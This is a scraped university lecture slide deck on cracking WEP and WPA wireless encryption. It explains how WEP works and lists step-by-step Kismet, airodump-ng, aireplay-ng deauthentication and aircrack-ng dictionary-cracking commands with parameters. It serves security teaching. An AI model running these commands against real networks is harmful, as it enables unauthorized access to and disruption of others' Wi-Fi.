45
1 WLAN Security: Cracking WEP/WPA รร. รร. รรรรรร รรรรรรร Assoc. Prof. Anan Phonphoem, Ph.D. [email protected] http://www.cpe.ku.ac.th/~anan Computer Engineering Department Kasetsart University, Bangkok, Thailand Wireless LANs 2011

WLAN Security: Cracking WEP/WPA

  • Upload
    verne

  • View
    67

  • Download
    3

Embed Size (px)

DESCRIPTION

Wireless LANs 2011. WLAN Security: Cracking WEP/WPA. รศ. ดร . อนันต์ ผลเพิ่ม Assoc. Prof. Anan Phonphoem, Ph.D. [email protected] http://www.cpe.ku.ac.th/~anan Computer Engineering Department Kasetsart University, Bangkok, Thailand. Secret Key (40-bit or 128-bit). IV. Initialization - PowerPoint PPT Presentation

Citation preview

Page 1: WLAN Security: Cracking WEP/WPA

1

WLAN Security:Cracking WEP/WPA

รศ. ดร. อนันต์ ผลเพิม่Assoc. Prof. Anan Phonphoem, Ph.D.

[email protected]://www.cpe.ku.ac.th/~anan

Computer Engineering DepartmentKasetsart University, Bangkok, Thailand

Wireless LANs2011

Page 2: WLAN Security: Cracking WEP/WPA

WEP Block Diagram

2

WEP Frame

IntegrityAlgorithm(CRC-32)

Pseudo-RandomNumber Generator

RC-4

+

BitwiseXOR

Plain Text

Cipher Text

Integrity CheckValue (ICV)

Key Sequence

Secret Key (40-bit or 128-bit)

InitializationVector (IV)

IV

Encryption BlockSender Site

IntegrityAlgorithm

Pseudo-RandomNumber Generator

BitwiseXOR

Cipher TextPlain Text

Integrity CheckValue (ICV)

Key Sequence

IV

Secret Key (40-bit or 128-bit)

Decryption BlockReceiver Site

Page 3: WLAN Security: Cracking WEP/WPA

3

WEP – Encoding

IntegrityAlgorithm(CRC-32)

Pseudo-RandomNumber Generator

RC-4

+

BitwiseXOR

Plain Text

Cipher Text

Integrity CheckValue (ICV)

Key Sequence

Secret Key (40-bit or 128-bit)

InitializationVector (IV)

IV

Page 4: WLAN Security: Cracking WEP/WPA

4

WEP Frame

Frame Header

IV Header Frame Body ICV

Trailer FCS

EncryptedClear Text Clear Text

4 bytes

4 bytes

Page 5: WLAN Security: Cracking WEP/WPA

5

WEP – Decryption

IntegrityAlgorithm

Pseudo-RandomNumber Generator

BitwiseXORCipher Text

Plain Text

Integrity CheckValue (ICV)

Key Sequence

IV

Secret Key (40-bit or 128-bit)

Page 6: WLAN Security: Cracking WEP/WPA

Cracking WEP

6

Page 7: WLAN Security: Cracking WEP/WPA

7

Cracking Steps1) Reconnaissance (Collect target info.)

[kismet]2) Run promiscuous mode [iwconfig,

airmon]3) Collect data [airodump]4) Crack key [aircrack]

Page 8: WLAN Security: Cracking WEP/WPA

8

Default SSIDs

Page 9: WLAN Security: Cracking WEP/WPA

9

1) Reconnaissance (Collect target info.)

Page 10: WLAN Security: Cracking WEP/WPA

10

Kismet (Reconnaissance)

Page 11: WLAN Security: Cracking WEP/WPA

11

Kismet (AP Info.)

Page 12: WLAN Security: Cracking WEP/WPA

12

Kismet (Client Info.)

Page 13: WLAN Security: Cracking WEP/WPA

13

2) Run promiscuous mode

Page 14: WLAN Security: Cracking WEP/WPA

14

1 2

3 4

Regular Behavior

Station 1 transmits to all (broadcast)

Page 15: WLAN Security: Cracking WEP/WPA

15

1 2

3 4

Intention to Eavesdrop

Promiscuousmode

Station 1 transmits to station 4

Page 16: WLAN Security: Cracking WEP/WPA

16

iwconfig

Page 17: WLAN Security: Cracking WEP/WPA

iwlist

17

Page 18: WLAN Security: Cracking WEP/WPA

Promiscuous Mode Setup

• By using iwconfig

18

Page 19: WLAN Security: Cracking WEP/WPA

Promiscuous Mode Setup

• By using airmon-ng

19

Page 20: WLAN Security: Cracking WEP/WPA

Promiscuous Mode Setup

20

Page 21: WLAN Security: Cracking WEP/WPA

21

3) Collect data

Page 22: WLAN Security: Cracking WEP/WPA

22

airodumpFrom Kismet

Page 23: WLAN Security: Cracking WEP/WPA

Airodump problemroot@APMoose:~/toulouse# airodump-ng mon0ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

/dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)”

anan@APMoose:~$ rfkill list0: phy0: Wireless LAN

Soft blocked: no software can reactivateHard blocked: no software cannot reactivate

1: acer-wireless: Wireless LANSoft blocked: noHard blocked: no

2: acer-bluetooth: BluetoothSoft blocked: noHard blocked: no

4: hci0: BluetoothSoft blocked: noHard blocked: no

Solve by:root@APMoose:~/toulouse# rfkill unblock all

23

Page 24: WLAN Security: Cracking WEP/WPA

24

airodump

Page 25: WLAN Security: Cracking WEP/WPA

25

airodump data files

Page 26: WLAN Security: Cracking WEP/WPA

26

4) Crack Key

Page 27: WLAN Security: Cracking WEP/WPA

aircrack• For non-encryption

27

Page 28: WLAN Security: Cracking WEP/WPA

28

aircrack

Page 29: WLAN Security: Cracking WEP/WPA

29

WEP Cracking Demo

Page 30: WLAN Security: Cracking WEP/WPA

Cracking WPA

30

Page 31: WLAN Security: Cracking WEP/WPA

Cracking Steps1)Start the wireless interface in monitor

mode on the specific AP channel2)Start airodump-ng on AP channel with

filter for bssid to collect authentication handshake

3)Use aireplay-ng to deauthenticate the wireless client

4)Run aircrack-ng to crack the pre-shared key using the authentication handshake

31http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Page 32: WLAN Security: Cracking WEP/WPA

32

1) Start Monitoring Mode

Page 33: WLAN Security: Cracking WEP/WPA

Check interface

33

Page 34: WLAN Security: Cracking WEP/WPA

iwconfig

34

Page 35: WLAN Security: Cracking WEP/WPA

Start monitoring mode

35

Page 36: WLAN Security: Cracking WEP/WPA

36

2) Start airodump-ngcollect authentication handshake

Page 37: WLAN Security: Cracking WEP/WPA

Start airodump-ng

37

Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0

Parameter Description-c 6 Wireless channel--bssid 00:1E:F7:xx:xx:xx

AP’s MAC

-w psk File name prefix (contain Ivs)mon0 Interface name

Page 38: WLAN Security: Cracking WEP/WPA

Start airodump-ng less parameter

38

Moose# airodump-ng -w psk mon0

Page 39: WLAN Security: Cracking WEP/WPA

39

3) Deauthenticate client

Page 40: WLAN Security: Cracking WEP/WPA

aireplay

40

Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0

Parameter Description-0 deauthentication1 # deauthentication sent-a 00:12:01:xx:xx:xx AP’s MAC -c 00:23:11:xx:xx:xx Deauthing client’s MAC-mon0 Interface name

Page 41: WLAN Security: Cracking WEP/WPA

41

4) Crack

Page 42: WLAN Security: Cracking WEP/WPA

Need a dictionary

42

Moose# aircrack-ng –b 00:12:01:xx:xx:xx -psk*.cap

Page 43: WLAN Security: Cracking WEP/WPA

With dictionary

43

Moose# aircrack-ng -w password.lst -psk*.cap

Page 44: WLAN Security: Cracking WEP/WPA

Handshake found

44http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Page 45: WLAN Security: Cracking WEP/WPA

Successfully Crack

45http://www.aircrack-ng.org/doku.php?id=cracking_wpa